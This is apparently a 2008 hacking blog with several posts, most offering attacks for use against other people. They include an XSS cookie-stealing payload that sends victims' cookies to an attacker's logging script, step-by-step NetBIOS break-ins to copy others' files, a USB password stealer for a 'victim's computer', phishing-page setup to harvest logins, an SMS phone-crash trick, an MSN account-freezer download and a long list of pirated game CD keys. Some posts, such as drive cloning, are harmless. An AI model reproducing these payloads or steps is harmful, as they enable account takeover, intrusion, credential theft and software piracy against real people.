Cookie Stealing Posted in Snarfing with tags cookie snarf, how to steal cookies on August 12, 2008 by hacktocrack
Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting). Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code: Code: jalert(document.cookie) After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an example of what might be in your cookie: Code: username=CyberPhreak; password=ilikepie This is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough. Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This Is the process of cookiestealing. Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies: Code:
And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example: Code: http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer. Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing. Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script: Code: <script> document.location=‘http://yoursite.com/steal.php?cookie=’+document.cookie; Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page. But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough: Code:
Click Me
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.
Restart your friend’s phone using sms Posted in hacking, offline hacking with tags hack phone with sms, how to restart phone, how to restart phone using sms, restart phone on August 4, 2008 by hacktocrack
Here is a new trick to restart ur friends mobile via sms with this trick only 1110,1110i,1112,1100,2100 can be restarted. just type ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, or 79 inverted commas in text msg and send it to ur friend having cells mention above and see wat happens.
Exploit SQL Server System Posted in Hardcore Hacking, Website hacks, hacking with tags hack sql, sql, sql hack, sql hacking, sql injection, sql server system on August 4, 2008 by hacktocrack
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server. 1. Direct connections via the Internet These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
Figure 1: Common SQL injection vulnerabilities found using WebInspect. 3. Enumerating the SQL Server Resolution Service Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434. 4. Cracking SA passwords Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability. 5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole. 6. SQL injection SQL injection attacks are executed via front-end Web applications that don’t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually — if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in Figure 3.
Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process. 7. Blind SQL injection These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn’t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4, comes in handy.
Figure 4: Absinthe tool takes the pain out of blind SQL injection testing. 8. Reverse engineering the system The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse engineering ploys. 9. Google hacks Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors — such as “Incorrect syntax near” — leaking from publicly accessible systems. Several Google queries are available at Johnny Long’s Google Hacking
Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth. 10. Perusing Web site source code Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
NetBios Hacking Posted in hacking, offline hacking with tags hack netbios, hacking netbios, how to hack netbios, netbios, netbios hacking, what is netbios on August 2, 2008 by hacktocrack
For this tutorial, I used Microsoft’s Windows XP Home Edition OS What is it? NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers. How can this be of useful to me? Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal. What do I need? Windows OS Cain and Abel CODE (http://www.oxid.it/downloads/ca_setup.exe) ————– So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local
subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.
It should begin to scan.
Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.
Part2, Trial and Error Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):
IF it didn’t work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
Part3,GatheringtheInformation. Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it. The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP. The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into. The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below
BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup Step4,BreakingIn ———————————————————————————————– Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)” An example for this tutorial would be: “net view \\192.168.1.103”
We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive. All’s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G…,” for a different target.
As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!
Congratulations!You’reDONE! But, before you leave, please look over some of this information for further help and just for thanks to me. -Commands used in this tutorial: PING NBTSTAT -a (IP Address of Target) NET VIEW \\(IP Address of Target) NET USE K: \\(IP Address of Target)\(SHARENAME) 4 Comments »
Game CD Keys Posted in Uncategorized with tags cd keys, download keygen, game cd keys, keygen, software cd keys on August 2, 2008 by hacktocrack
1503 A.D. The New World serial: 0705-7933859-6725970-0015 Age Of Mythology br Serial: P3HM4-WDM27-662XW-9BPTV-CFVMQ Al Qaeda Hunting 3D serial: 23822 Back and White Br serial : 0901-3324366-4702210-2081 Battlefield 1942 Serial : 5000-0000000-0000000-1318 Battlefield 1942: Secret Weapons of WWII: 2gyy-3wlk-8btf-wjur-g277 Battlefield Vietnam: V2W6-54VJ-9R11-XJPV-79CM Battlefield 2: TW99-NWBV-0PVZ-EAEI-JVTL BLACK & WHITE BR - 0901-3324366-4702210-2081 Black & White: Creature Isle serial: 1740-9488245-5171152-1858 Chrome (c) Take 2: XTITY-92Y9L-MGPVA-KJ4Z6 CLIVE BARKER’S UNDYING - 2500-0911911-0911911-2705 Comanche 4 serial: 3s2d-flt1-cls2-rule-7865 Command & Conquer Generals: Zero Hour Expansion: ULPF-ZEVK-FRWG-Q4YJ-6F2T Command & Conquer: Renegade serial: 056894-929488-118387-9679 COMMAND E CONQUER GENERALS SERIAL: 4963-7882913-5984076-0674 Copa do Mundo FIFA 2002 BR SERIAL: 5500-5827167-6713862-1708 Dark Reign 2 CD Key : GAR3-RAB8-FUP9-NYZ7-2832 Dead Man’s Hand S/N: DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K Delta Force 3: Land Warrior - s/n: N5E3-YXH2-G983-9WYB-B3ZS Delta Force 4: Task Force Dagger serial: 72YL-R4SB-GKG6-3WKS-HQ27 Delta Force 5 Black Hawk Down serial: QF7S-HZMK-XLXP-CUJN-HDTZ Delta Force Black Hawk Down: Team Sabre (Expansão) Delta Force Xtreme: DFX-WESTIL-LKICKY-DULASS-ANYDAY Serial: AV4E-YVQE-NACM-DD3M-KBW3 DELTA FORCE: LAND WARRIOR - N33G-6HM2-9Y8F-HD4U-M7S9 Devastation_CDKEY: 5B36F-976AA-6A471-58B8D-92B7B
DOOM 3 CD Key: VB44-6BWV-H6UZ-RRPE-5E Dominius II Serial: 1111-1111-1111-064 Earth 2150 : Lost Souls Serial : 7XJC-UD2E-E83L-Z5T5 Emperor: Rise of the Middle Kingdom Serial : BAC9-RAL8-SAS2-SAX2-9999 Empire Earth: Art of Conquest Serial : GER2-MAN2-RAP2-PER5-2252 F1 2002 SERIAL: 7931-9865028-6024865-1156 F1 champiship season 2000 serial: 2000-5005241-5005241-6839 FA_Premier_League_Manager_2002: 4507-1863659-3033569-5650 FIFA 2003 BR: BL7G-929A-2YXE-UFZZ FIFA SOCCER 06: ON99-FLZU-9DEV-WTFM-6DEV Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS FREEDOM FORCE: 1439-8808778-3837107-2854 Frontline Attack - War over Europe SERIAL: FUBP-EYNZ-KFXC-SKM2 Galactic Civilizations With Bonus serial: DN-500792-GC1-CLS4FLT8XT GLOBAL OPERATIONS: 5000-0000000-0000000-5021 Ground Control Serial : RAC2-RAL2-CAS3-RAD3-3542 half life couter strike serial: 2462-92319-7642 half life edição especial:UCF1840810021327 half life opposing force serial: 2708-43011-3332 ou UCF1840810021327 HALF LIFE: UCF1840810021327 HALF-LIFE - 2420-92220-4482 HALF-LIFE: COUNTER-STRIKE - 2462-92319-7642 HARRY POTTER : 0901-7014788-4117807-0206 Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV HARY POTER E A CAMERA SECRETA SERIAL: 7954-3123341-1387427-3052 Heli Heroes - serial: 8bnk-c9eh-63hb-kj88 Hidden and Dangerous 2: 1234-5678-9abc-dddf Homeworld 2 (c) SIERRA: NAS3-DEC2-BYJ5-CUJ6-8385 homeworld: BAB2-BAB2-CEZ8-TAC3-9978 Hoyle_Majestic Chess: XYN6-NAB4-FES2-MUX7-3485 IGI 2 COVERT STRIKE SERIAL: 031F-F8D0-6536-B510 James Bond 007: NightFire Serial : 1740-9488245-5171152-5578 Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537 Kelly Slater Pro Surfer Serial: 0f162xa28pg34dhc Kingdom Under Fire Gold Edition serials: E3VI FP69 HT79 5KVG Lego Soccer Mania serial: 1500-0776239-9370523-4726 madden nfl 2001: 1500-6610360-1643530-0243 Madden NFL 2004: VMZ9-JXRC-AZOR-J000-1911 Madden_NFL_2002_ CDKEY enter: 0901-5445152-2745753-4827 Medal Of Honor Allied Assault Breakthrough: L5KB-32WY-B6G5-6747-YQ49 Medal of Honor: Allied Assault CD Key, enter 5000-0000000-0000000-5068 MEDAL OF HONNOR: ALLIED ASSAULTKey: 7931-9865028-6024865-9663 Microsoft Flight Simulator 2002 - Airport 2002 Volume 1serial use:
A221-A24AABAA-FDBA5DD9 Moto Racer 3: 54e9-a751-1da8-e109-efb3-51f9-d90f-75d02250 MVP Baseball 2003 CD Key: JNXC-PAPN-KR96-MY5P nascar 2002 SERIAL: RAF2-RAL2-RAS2-RAX2-6667 NASCAR RACING 4 - GAC7 REB8 TUX6 DAC2 7833 Nascar Thunder 2003 serial: NASC-ARTH-UNDE-RJAM Nascar Thunder 2004: CLZH-PE48-R9RR-G9ZT-9DSW NBA LIVE 2001 - 2001-0020601-0010978-6694 NBA Live 2001 CD Key: 2001-0020601-0010978-6694 NEED FOR SPEED 2003: HOT PURSUIT 2 serial: 8249-7EE3-84EW-TXGT Need For Speed: Underground s/n: SQZZ-2Y44-8AS4-7QSQ-YDEV Neverwinter Nights serial QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPERDJTG NHL 2002: 1000-2003004-0000000-4904 NHL 2004: 6T22-8L62-6666-8666-6666 O.R.B:SERIAL: JTRV74NVVKUJX7AM Operation Flashpoint Gold Upgrade Red Hammer serial M3CZ P5186 XNEYL CL0T7 513NT OUT LIVE BR: c9523c-1a4466-237cb8-dc7e67 Pro Evolution Soccer 5: NXUD-PACV-EM2X-KPC9-6AYU QUAKE III Arena - THWT37AB3P7JBTPC QUAKE III Team Arena - TSBH 7CCG DPWP B2LT 84 QUAKE IV: 9TFP-TXCG-XFMM-XXR9-9DGT Return to Castle Wolfenstein CD Key: CLAL-A7WJ-DTSJ-WARP-88 Rise of Nations:RXVC3-B3347-DVG9X-FTFQF-9M7XT Roller Coaster Tycoon 3 serial: RLDU-M24D-83CX-C8LZ-WDHS-ETND S.W.A.T. 3 - Elite Edition - TED4-SAB4-DUB7-CYJ2-8652 Sacrifice serial: xxxx-xxxx-xxxx-xxxx Sail Simulator 4.2 Serial : SS42-V7CGQ-9BCGM-4C326-JW25C Savage: The Battle for Newerth: LB42-Z05V-VK9S-I7BM-58S5 Sega GT Serial : GTJ08010-322007-01723 Serial do Tiger: 1500-3202255-2068109-2932 Shogun 2: CDKEYS = 0901-3721384-6427058-7026 Shogun Total War Serial : 1600-0052410-0052410-6424 SIM CITY 3000 UNLIMITED BR - 5001-9781634-6520278-1000 Sim City 4 Rush Hour *MULTI*: CLC4-5ZU8-6C4S-9W46-LS4E simcity 4 serial: GRUS-4528-8217-1ULF Simcoaster serial : 2001-0013101-0010978-2823 SIMGOLF: 5000-0000000-0000000-5071 SOLDIER OF FORTUNE 2: 3Z4J - J3PP - K848 - EWPK - 1F SOLDIER OF FORTUNE GOLD - BEN6-MUC8-BEZ6-BUJ6-3764 Spell Force: 08AFX-CGGML-W260D-5RRP0-CVNFD Spy Hunter Serial: SHU3E7RVCCRBFHSS
Star Trek Elite Force 2 - TFAK-7WCH-44RH-YJ7X-F9E9 Star Trek StarFleet Command : Orion Pirates Serial : 4008-B491-1DC3-0F6C starfleet command 3 serial: 0000-0000-0000-K28K STARTRECK: RYS8-LAB4-JEF8-BYM3-4652 Sub Command: Seawolf-Akula CDKEY: 0901-1315206-2102812-3248 SUPERBIKE 2001 - 1500-4288423-2982915-3163 Team Factor SERIAL: 2NKZYY9-2SKAKSC Terminator 3: Rise of the Machines Serial: TTDA-H8VW-KJDV-NNKA THE SIMS BR - 100486-585530-905808-0928 THE SIMS DELUXE BR SERIAL: 5500-5782961-4067120-2138 5500-7457886-5179416-4991 throne of darkness serial : RAC2-RAD2-RAC2-RAC2-3387 Tiger Woods PGA Tour 2002 serial: 5000-0000000-0000000-5045 TIGER WOODS PGA TOUR 2003 SERIAL: FLTR-0825-9192-1RLC Tony Hawks Pro Skater 4: P4EPBTIQDAIH7WXM Total Club Manager 2003 serial : 1500127097911060657818 Train Simulator - The Activities Serial: 6850-YV6AYS6B Trainz serial, enter: RAZO-R9XI-XXXC-XXXT-XXGX-1911 Tron 2.0 (c) Disney Interactive: 9393-L9CN-PRTB-T7N4-5858 Universal Combat Serial: 2B46-97F6-OF33-99BB “Atenção o O podera ser um 0″ Unreal Tournament 2003 Serial : LYR22-RZ743-A9D7T-CNNEN War! Age of Imperialism: 1101-8603-2629-7418 Lord of the Rings: War of the Ring: XUF5-JUB2-JAB8-JUD3-4947 Lord Of The Rings The Return Of The King: s/n: TMXF-Q23L-LCEG-Y9WW-V94G Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV MSEE-5EL4-WYBB-DGLU-GDEV 6Q7F-WAAC-8QTH-WLC4-EDEV Q3N6-2X4N-A4EA-NY64-GDEV GJGQ-4SLL-EA4Y-FJSU-UDEV 5LM5-M22H-45YT-W88Z-2DEV C6U4-7A49-4CE2-MUGL-8DEV BH4U-GCNX-WMJ8-ZGKY-4DEV KAU4-AVFV-34AK-782Y-4DEV Y3QQ-TUGW-4NU4-ZG68-6DEV Hidden and Dangerous 2: 1234-5678-9abc-dddf Pinnacle Instant Video Album V1.01 Multilanguage: 7777777777 The Sims Num Passe de Magica: U9BK-8XSP-YAG4-WYL4-SDEV PSB3-DLW5-3GPV-P8BU-HDEV Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537 CIVIL 3D V2004: 400-00000000 War! Age of Imperialism: 1101-8603-2629-7418
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS Cakewalk MediaWorks Serial: CWMW1.00-009968 Neato MediaFace Serial: 7135be-1339bd-1a33-5c670 NHL 2004: 6T22-8L62-6666-8666-6666 FQ22-BXTP-FLT!-ELT!-FLT! CHYQ-AVKH-CRKD-GRKD-CRKD BZ8G-WCOL-L8JD-SUXM-LTBV A75V-8YSW-JQ75-NE79-LC4W ZZGY-JQVB-PJ4T-6K6K-4INY B233-BN2E-BUL3-87C5-4YZA AWZH-HVNV-P8FK-XHPQ-8EUJ J4LL-PZID-QZEM-RPQ2-UHRF RKRR-R3C4-QWP8-QUXI-96KC 1 Comment »
Cloning Hard Drives Posted in hacking with tags clone hard drive, cloning hard drives, hack, hacking, hacking tips and tricks, how to clone hard drive on August 2, 2008 by hacktocrack
Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem. Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to. First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag. Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag. Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button. Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”. Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:
Click on the “Start” button, then click on the “Run…” button, then place the following into the Runbox: “XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button. If you receive an error message, then remove the space from between XCOPY and C:\ Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out. This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it. 2 Comments »
USB Password Stealer Posted in Easy Hacking, Password Hacking, hacking, offline hacking with tags hack passwords, hack windows password, hack xp, hack xp password, licence stealer, password hacker, Password Hacking, steal passwords, steal usb passwords, usb hacking, usb hacks, usb password stealer, usb theif, usbtheif, xp hacks on July 30, 2008 by hacktocrack
Tweaked USB that steals every passwords including licences. Instructions 1.Decompress the archive and put all the files located in the folder “USBThief”into a USB. 2.Insert the USB in your victim’s computer. 3.View folder “dump” to see the passwords. Download Password: www.dl4all.com 3 Comments »
Protect yourself from fake login pages Posted in Password Hacking with tags fake login pages, hacking, hacking tips, how to make fake login pages, how to phish, learn how to phish, login phishing, phishing, protect yourself from phishing on July 26, 2008 by hacktocrack
Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc … This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip. Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars. What goes on behind when you enter your login details in login form?? When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page. What an hacker does?? A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page. How to identify fake login page traps ?? 1. Never enter you login details in unknown sites. 2. Always type the address directly in to the browser. 3. Do not follows the links you get in mails and chatting even if they are from your friends 4. Always have a keen look in the address bar and verify if the address is correct. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap. 5. Please do report to the hosting site or the original site owner when you find a fake login page. 6. If you feel like you entered your details in a fake login page change your password immediatley. Now let’s go on with the trick..
You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page. Check that text file to get the passwords you wanted. Here is the demo of the trick Note:Don’t enter your actual password click this link to view the fake login page of yahoo The password you entered is saved into this page 1 Comment »
Hacktocrack Is Back Online! Posted in Uncategorized on July 26, 2008 by hacktocrack
Hey Everyone This Blog Had Been Suspended For A Few Months. I finally hacked my own blog to unsuspend it.. I have no Idea if this site might get suspended again.. but anyways I will try to keep it for as long as possible… I have to Moderate over 400 comments Now lol. Will Start Posting again soon… Hacktocrack has an official site at www.ageniusblog.com check it out! Leave A Comment »
Create Folders And Files With NO! Name Posted in Easy Hacking, Notepad Tricks, Other, hacking tips, offline hacking with tags create file with no name, create folder with no name, Create Folders And Files With NO! Name, free tips, hacking, hacking tips, hacking tricks on April 5, 2008 by hacktocrack
This trick will allow you to create files and folders without any name. Just follow the following steps: 1.Select any file or folder. 2.Right click on it, press rename or simply press F2. 3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad. Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys. 4.Press Enter and the nameless file or folder will be created. Reason: The file or folder that seems nameless is actually named with a single space. But what if you want to create another nameless file or folder in the same directory ? For this you will have to rename the file with 2 spaces. Just follow these steps below: 1.Select file, press F2. 2.Hold alt key and type 0160 from the numpad. 3.Release the alt key. Now without doing anything else, again hold alt key and press 0160. 4.Press enter and you will have second nameless file in the same directory. 5.Repeat step 3 to create as many nameless files or folders in the same directory. (we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.) 8 Comments »
Ice Cold Reloaded Posted in Easy Hacking, Email, Hotmail with tags hack hotmail, hack msn hotmail, how to hack, how to hack hotmail, msn freezer on April 5, 2008 by hacktocrack
MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.
Download Link http://download.download-free-software.net/IceCold_ReLoaded 12 Comments »
Test - Hack Into this page Posted in Password Hacking, hacking, hacking websites with tags hack into page, hack websites, hacking, how to hack websites, Password Hacking, website hacking on April 5, 2008 by hacktocrack
A Test to see if You are Really A Hacker Hack This Page http://hacktocrack.wordpress.com/hack-into-this-page/ Very Simple. Leave A Comment On The Page To Let Me Know If You Have Hacked It 22 Comments »
Find IP info using Gmail/Yahoo/Hotmail Posted in IP tools, Website hacks with tags Find IP, Find IP info, Find IP info using Gmail, Find IP info using Gmail/Hotmail, Find IP info using Gmail/Yahoo, Find IP info using Gmail/Yahoo/Hotmail, Find IP info using Hotmail, Find IP info using Yahoo, Find IP info using Yahoo/Hotmail on April 4, 2008 by hacktocrack
When you recieve an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [129.130.1.1] Finding IP address in Gmail 1. Log into your Gmail account with your username and password. 2. Open the mail. 3. To display the email headers, •
